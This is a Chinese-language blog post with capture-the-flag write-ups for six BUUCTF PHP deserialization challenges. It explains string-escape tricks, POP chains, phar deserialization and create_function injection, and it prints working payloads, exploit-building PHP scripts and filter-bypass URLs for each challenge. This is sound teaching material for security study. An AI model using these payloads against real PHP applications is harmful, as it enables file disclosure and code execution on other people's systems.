<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>Hexo</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Hexo"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Hexo"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="__ SpadeHeart __   __首页    __归档    buu几道php反序列化题目__ 发表于 2022-02-10 [安洵杯 2019]easy_serialize_php     在phpinfo看到d0g3_f1ag.php     题目先序列化$_SESSION，然后再经过一个过滤函数，然后再反序列化     过滤函数会替换掉一些关键词，这样就会造成反序列化的对象逃逸"><meta property="og:type" content="blog"><meta property="og:title" content="Hexo"><meta property="og:url" content="http://example.com/2022/05/02/11/"><meta property="og:site_name" content="Hexo"><meta property="og:description" content="__ SpadeHeart __   __首页    __归档    buu几道php反序列化题目__ 发表于 2022-02-10 [安洵杯 2019]easy_serialize_php     在phpinfo看到d0g3_f1ag.php     题目先序列化$_SESSION，然后再经过一个过滤函数，然后再反序列化     过滤函数会替换掉一些关键词，这样就会造成反序列化的对象逃逸"><meta property="og:locale" content="en_US"><meta property="og:image" content="http://example.com/img/og_image.png"><meta property="article:published_time" content="2022-05-02T06:11:47.912Z"><meta property="article:modified_time" content="2022-05-02T04:07:32.954Z"><meta property="article:author" content="John Doe"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2022/05/02/11/"},"headline":"Hexo","image":["http://example.com/img/og_image.png"],"datePublished":"2022-05-02T06:11:47.912Z","dateModified":"2022-05-02T04:07:32.954Z","author":{"@type":"Person","name":"John Doe"},"publisher":{"@type":"Organization","name":"Hexo","logo":{"@type":"ImageObject","url":"http://example.com/img/logo.svg"}},"description":"__ SpadeHeart __   __首页    __归档    buu几道php反序列化题目__ 发表于 2022-02-10 [安洵杯 2019]easy_serialize_php     在phpinfo看到d0g3_f1ag.php     题目先序列化$_SESSION，然后再经过一个过滤函数，然后再反序列化     过滤函数会替换掉一些关键词，这样就会造成反序列化的对象逃逸"}</script><link rel="canonical" href="http://example.com/2022/05/02/11/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }
          Array
              .from(document.querySelectorAll('.tab-content'))
              .forEach($tab => {
                  $tab.classList.add('is-hidden');
              });
          Array
              .from(document.querySelectorAll('.tabs li'))
              .forEach($tab => {
                  $tab.classList.remove('is-active');
              });
          const $activeTab = document.querySelector(location.hash);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
          const $tabMenu = document.querySelector(`a[href="${location.hash}"]`);
          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.1.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="Hexo" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2022-05-02T06:11:47.912Z" title="2022/5/2 14:11:47">2022-05-02</time></span><span class="level-item">Updated&nbsp;<time dateTime="2022-05-02T04:07:32.954Z" title="2022/5/2 12:07:32">2022-05-02</time></span><span class="level-item">15 minutes read (About 2292 words)</span></div></div><div class="content"><p><a href="/"> __ SpadeHeart __</a></p>
<ul>
<li><p><a href="/%20"> __<br>首页 </a></p>
</li>
<li><p><a href="/archives/%20"> __<br>归档 </a></p>
</li>
</ul>
<h1 id="buu几道php反序列化题目"><a href="#buu几道php反序列化题目" class="headerlink" title="buu几道php反序列化题目"></a>buu几道php反序列化题目</h1><p>__ 发表于 2022-02-10</p>
<p>[安洵杯 2019]easy_serialize_php</p>
<pre><code>    在phpinfo看到d0g3_f1ag.php
    题目先序列化$_SESSION，然后再经过一个过滤函数，然后再反序列化
    过滤函数会替换掉一些关键词，这样就会造成反序列化的对象逃逸

    &#39;php&#39;,&#39;flag&#39;,&#39;php5&#39;,&#39;php4&#39;,&#39;fl1g&#39;会被替换为空
    造成序列化对象长度变短

    d0g3_f1ag.php进行base64编码：ZDBnM19mMWFnLnBocA==
    直接传入show_image显示了hi,here you want to find me?
    判断是后台传入另一个文件来读取

    思路：
    通过构造带有过滤词的序列化对象来造成长度变短的字符串逃逸来修改img对应的值

    a:3:&#123;s:4:&quot;user&quot;;s:24:&quot;flagflagflagflagflagflag&quot;;s:8:&quot;function&quot;;s:59:&quot;a&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA==&quot;;s:2:&quot;aa&quot;;s:1:&quot;a&quot;;&#125;
    因为源码里会序列化所以这里要post传入数组，根据这个payload，传入数据为        _SESSION[user]=flagflagflagflagflagflag&amp;_SESSION[function]=a&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA==&quot;;s:2:&quot;aa&quot;;s:1:&quot;a&quot;;&#125;
    看到：
    $flag = &#39;flag in /d0g3_fllllllag&#39;;
    /d0g3_fllllllag -&gt; L2QwZzNfZmxsbGxsbGFn
_SESSION[user]=flagflagflagflagflagflag&amp;_SESSION[function]=a&quot;;s:3:&quot;img&quot;;s:20:&quot;L2QwZzNfZmxsbGxsbGFn&quot;;s:2:&quot;aa&quot;;s:1:&quot;a&quot;;&#125;
    得到flag
    
</code></pre>
<p>[MRCTF2020]Ezpop</p>
<pre><code>    以调用函数的方式调用一个对象时，__invoke方法会被自动调用
    __construct   当一个对象创建时被调用，
    __toString   当一个对象被当作一个字符串被调用。
    __wakeup()   使用unserialize时触发
    __get()    用于从不可访问的属性读取数据
    #难以访问包括：（1）私有属性，（2）没有初始化的属性
    __invoke()   当脚本尝试将对象调用为函数时触发

    序列化Pop链：
    利用几个类之间相互关联进行构造
    文件包含漏洞：
    Modifier类中append函数使用了include()，会出现文件包含漏洞。

    用get方法传一个pop参数后，会自动调用Show类的_wakeup()魔术方法。
    _wakeup()通过preg_match()将$this-&gt;source做字符串比较，如果$this-&gt;source是Show类，就调用了__toString()方法；
    如果__toString()其中str赋值为一个实例化的Test类，那么其类不含有source属性，所以会调用Test中的_get()方法。
    如果_get()中的p赋值为Modifier类，那么相当于Modifier类被当作函数处理，所以会调用Modifier类中的_invoke()方法。
    利用文件包含漏洞，使用_invoke()读取flag.php的内容。
    &lt;?php
    class Modifier &#123;
        protected  $var=&#39;php://filter/read=convert.base64-encode/resource=flag.php&#39;;
    &#125;
    class Show&#123;
        public $source;
        public $str;
        public function __construct($file)&#123;
            $this-&gt;source = $file;
            echo &#39;Welcome to &#39;.$this-&gt;source.&quot;&lt;br&gt;&quot;;
        &#125;
        public function __toString()&#123;
            return &#39;asd&#39;;
        &#125;
    &#125;
    class Test&#123;
        public $p;
    &#125;
    $a=new Show(&#39;spade&#39;);
    $a-&gt;str=new Test();
    $a-&gt;str-&gt;p=new Modifier();
    $b=new Show($a);
    echo urlencode(serialize($b));
    ?&gt;
    脚本构造序列化对象传入，得到flag
    
</code></pre>
<p>[0CTF 2016]piapiapia</p>
<pre><code>    扫目录看到config.php，register.php，index.php，update.php，class.php，profile.php
    找到源码：www.zip
    分析源码发现：
    profile.php有：unserialize和file_get_contents
    update.php有：serialize
    思路：
    把$profile的photo设为config.php
    $profile是通过$user的show_profile函数传过来的，传过去$username参数
    user类继承mysql类，先过滤再select
    filter替换字符串中的单引号和双反斜杠为下划线 ，并且替换多个字符串为hacker（where-&gt;hacker）
    select方法是从数据库中取数据
    user类的update_profile更新数据
    update.php调用了update_profile，这里是用了POST传入的profile的各个数据来序列化
    反序列化字符串逃逸：
    传入数组来绕过对nickname的正则校验（传参时写成nickname[]=...）
    需要填充的是&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;长度为34，所以要在nickname开头先输入34个where来逃逸修改photo
    在update.php传参：        nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;
    接着在profile.php就能看到flag的base64编码
    
</code></pre>
<p>[CISCN2019 华北赛区 Day1 Web1]Dropbox</p>
<pre><code>    下载时抓包改路径可以下载到源码
    class.php中的File类的delete函数里有unlink()可以利用
    测试发现
    Filelist类的__destruct方法可以任意文件读取（能下载源码就是因为这个）
    File类的delete有unlink函数
    File类的close方法有file_get_content
    delete.php中调用了delete函数

    文件能上传，有魔术方法，有文件操作函数：
    可以phar反序列化

    思路：
    首先建一个User类，把它的db设为一个FileList类；
    把db的files变量设为‘/flag.txt’；
    这样当User类销毁时，会导致db执行close方法，FileList没有这个方法所以会调用__call；
    如果我们事先把FileList的files变量设置为有一个File对象且初始化filename变量为‘/flag.txt’的数组；
    在__call函数里它被处理后就变成：flag.txt调用File类的close方法即读取了flag.txt
    &lt;?php
    class User&#123;
        public $db;
    &#125;
    class File&#123;
        public $filename;
        public function __construct($filename) &#123;
            $this-&gt;filename = $filename;
        &#125;
    &#125;
    class FileList&#123;
        private $files;
        public function __construct()&#123;
            $this-&gt;files=array(new File(&#39;/flag.txt&#39;));
        &#125;
    &#125;
    $u = new User();
    $u-&gt;db=new FileList();
    @unlink(&quot;phar.phar&quot;);
    $phar = new Phar(&quot;phar.phar&quot;);
    $phar-&gt;startBuffering();
    $phar-&gt;setStub(&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;);
    $phar-&gt;setMetadata($u);
    $phar-&gt;addFromString(&quot;test.txt&quot;, &quot;test&quot;); 
    $phar-&gt;stopBuffering();
    ?&gt;
    生成后上传抓包改成gif，删除页面filename改为phar://phar.gif即可
    
</code></pre>
<p>[SWPUCTF 2018]SimplePHP</p>
<pre><code>    源码提示：flag is in f1ag.php
    file.php：
    $show = new Show(); 
    if(file_exists($file)) &#123; 
        $show-&gt;source = $file; 
        $show-&gt;_show();  

    猜测是phar反序列化
    分析：
    $file属性是一个Show类，它的str属性是个数组，key为str，值为Test类（因为Test没有source属性，可触发Test的_get方法）
    这里注意Test类的param要用key为source，这样它才会在调用不存在的source属性时传入‘source’为参数
    接下来要触发Show的toString：C1e4r类的_destruct方法有echo，把这个类初始化传入Show类即可触发
    pop链条：C1e4r类的_destruct-&gt;Show的toString-&gt;Test的_get-&gt;Test的file_get
    脚本：
    &lt;?php
    class C1e4r&#123;
        public $test;
        public $str;
    &#125;
    class Show
    &#123;
        public $source;
        public $str;
    &#125;
    class Test
    &#123;
        public $file;
        public $params;
    &#125;
    $t = new Test();
    $c = new C1e4r();
    $s = new Show();
    $t-&gt;params[&quot;source&quot;]=&quot;/var/www/html/f1ag.php&quot;;
    $c-&gt;str=$s;//这里注意这句和下一句顺序不能换，因为C1e4r类的str要先赋值，这样destruct时Show对象才会有str[&#39;str&#39;]的存在
    $s-&gt;str[&#39;str&#39;]=$t;

    $phar = new Phar(&quot;sp.phar&quot;);
    $phar-&gt;startBuffering();
    $phar-&gt;setStub(&#39;&lt;?php __HALT_COMPILER(); ? &gt;&#39;);
    $phar-&gt;setMetadata($c); //触发头是C1e4r类
    $phar-&gt;addFromString(&quot;exp.txt&quot;, &quot;test&quot;); //生成签名
    $phar-&gt;stopBuffering();
    ?&gt;
</code></pre>
<p>[BJDCTF2020]EzPHP</p>
<pre><code>    网页源码看到： GFXEIM3YFZYGQ4A= 
    base32解码：1nD3x.php

    知识点：
    1.$_SERVER[‘QUERY_STRING’]不会url解码，可以通过url编码绕过
    2.用换行符绕过 ?debu=auqa_is_cute%0a
    3.REQUEST可以接受get和post请求,但是post具有优先级，所有可以用post和get传两个一样的来绕过
    4.REQUEST会把cookie包含进来，由于cookie里有英文所以过不了那个if，因此需要删除cookie才能过
    5.data协议
    6.数组绕过sha1
    7.利用extract函数将code和args赋值，然后拿flag
    
    $_SERVER[“QUERY_STRING”] 获取的是?后面的值
    code和arg的传参原理是源码的extract($_GET[&quot;flag&quot;])，这个函数把值赋给键，从而实现传参
    arg参数值开头用‘&#125;’来闭合，因为create_function之后，根据传入的参数，实际执行的函数会用一对‘&#123;&#125;’包裹arg里的语句，所以把它闭合从而让构造的命令在函数外面执行，这样就完成create_function注入。这题源码包含了flag.php，所以可以用arg传参输出所有参数
    有几个参数会有$_REQUEST的逐项检查是否有字母，由于$_REQUEST读取数据有优先级，所以可以用POST传入同名参数来覆盖从而绕过检测
    
payload：     deb%75=aq%75a_is_c%75te%0a&amp;file=data://text/plain,deb%75_deb%75_aq%75a&amp;sh%61na[]=1&amp;p%61sswd[]=2&amp;fl%61g[c%6fde]=create_function&amp;fl%61g[%61rg]=&#125;var_dump(get_defined_vars());%23
POST传参：debu=1&amp;file=2

    看到：rea1fl4g.php
    访问还是没有flag，所以要回到之前的页面包含这个页面，方法是用之前的payload并在arg参数里加上一句：require(base64_dec%6fde(cmVhMWZsNGcucGhw));
    但是得到的flag是假的，所以判断flag不在变量里，这时就要php://协议获取文件的源码
    语句：require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php);
    为了绕过各种过滤，使用按位取反
    require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));
    这个命令放进payload即可
    
</code></pre>
<p><a href="/2022/02/05/buu%E5%89%8D%E4%B8%80%E9%A1%B5%E5%8D%8A%E7%9A%84%E4%B8%80%E4%BA%9B%E9%A2%98/" title="buu前一页半的一些题"><br>__buu前一页半的一些题</a></p>
<p><a href="/2022/02/14/sql%E6%B3%A8%E5%85%A5-%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5/" title="sql注入-无列名注入"> sql注入-无列名注入<br>__</a></p>
<p><a href="/archives/%20%7C%7C%20archive"> 33 日志 </a></p>
<p>(C) 2022 __ Dan Kuroto</p>
<p>由 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> 强力驱动</p>
<p>|</p>
<p>主题 – <a target="_blank" rel="noopener" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</p>
<p>__</p>
</div><div class="article-licensing box"><div class="licensing-title"><p><a href="http://example.com/2022/05/02/11/">http://example.com/2022/05/02/11/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>John Doe</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2022-05-02</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2022-05-02</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="notification is-danger">You need to set <code>install_url</code> to use ShareThis. Please set it in <code>_config.yml</code>.</div></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"><a class="button donate" href="/" target="_blank" rel="noopener" data-type="afdian"><span class="icon is-small"><i class="fas fa-charging-station"></i></span><span>Afdian.net</span></a><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>Alipay</span><span class="qrcode"><img src="/" alt="Alipay"></span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="buymeacoffee"><span class="icon is-small"><i class="fas fa-coffee"></i></span><span>Buy me a coffee</span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="patreon"><span class="icon is-small"><i class="fab fa-patreon"></i></span><span>Patreon</span></a><div class="notification is-danger">You forgot to set the <code>business</code> or <code>currency_code</code> for Paypal. Please set it in <code>_config.yml</code>.</div><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>Wechat</span><span class="qrcode"><img src="/" alt="Wechat"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2022/05/02/12/"><i class="level-item fas fa-chevron-left"></i><span class="level-item"> </span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2022/05/02/10/"><span class="level-item"> </span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><div class="notification is-danger">You forgot to set the <code>shortname</code> for Disqus. Please set it in <code>_config.yml</code>.</div></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="/img/avatar.jpg" alt="SpadeAce"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">SpadeAce</p><p class="is-size-6 is-block">kamen rider</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>China</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">15</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">0</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/SpadeHeart/SpadeHeart.github.io" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/SpadeHeart/SpadeHeart.github.io"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Facebook" href="https://facebook.com"><i class="fab fa-facebook"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Twitter" href="https://twitter.com"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Dribbble" href="https://dribbble.com"><i class="fab fa-dribbble"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><!--!--><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">Links</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://hexo.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Hexo</span></span><span class="level-right"><span class="level-item tag">hexo.io</span></span></a></li><li><a class="level is-mobile" href="https://bulma.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Bulma</span></span><span class="level-right"><span class="level-item tag">bulma.io</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">Recents</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-05-02T06:11:47.917Z">2022-05-02</time></p><p class="title"><a href="/2022/05/02/14/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-05-02T06:11:47.916Z">2022-05-02</time></p><p class="title"><a href="/2022/05/02/13/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-05-02T06:11:47.914Z">2022-05-02</time></p><p class="title"><a href="/2022/05/02/12/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-05-02T06:11:47.912Z">2022-05-02</time></p><p class="title"><a href="/2022/05/02/11/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-05-02T06:11:47.911Z">2022-05-02</time></p><p class="title"><a href="/2022/05/02/10/"> </a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2022/05/"><span class="level-start"><span class="level-item">May 2022</span></span><span class="level-end"><span class="level-item tag">15</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">Subscribe for updates</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div><div class="card widget"><div class="card-content"><div class="notification is-danger">You need to set <code>client_id</code> and <code>slot_id</code> to show this AD unit. Please set it in <code>_config.yml</code>.</div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">follow.it</h3><form action="" method="post" target="_blank"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="Hexo" height="28"></a><p class="is-size-7"><span>&copy; 2022 John Doe</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>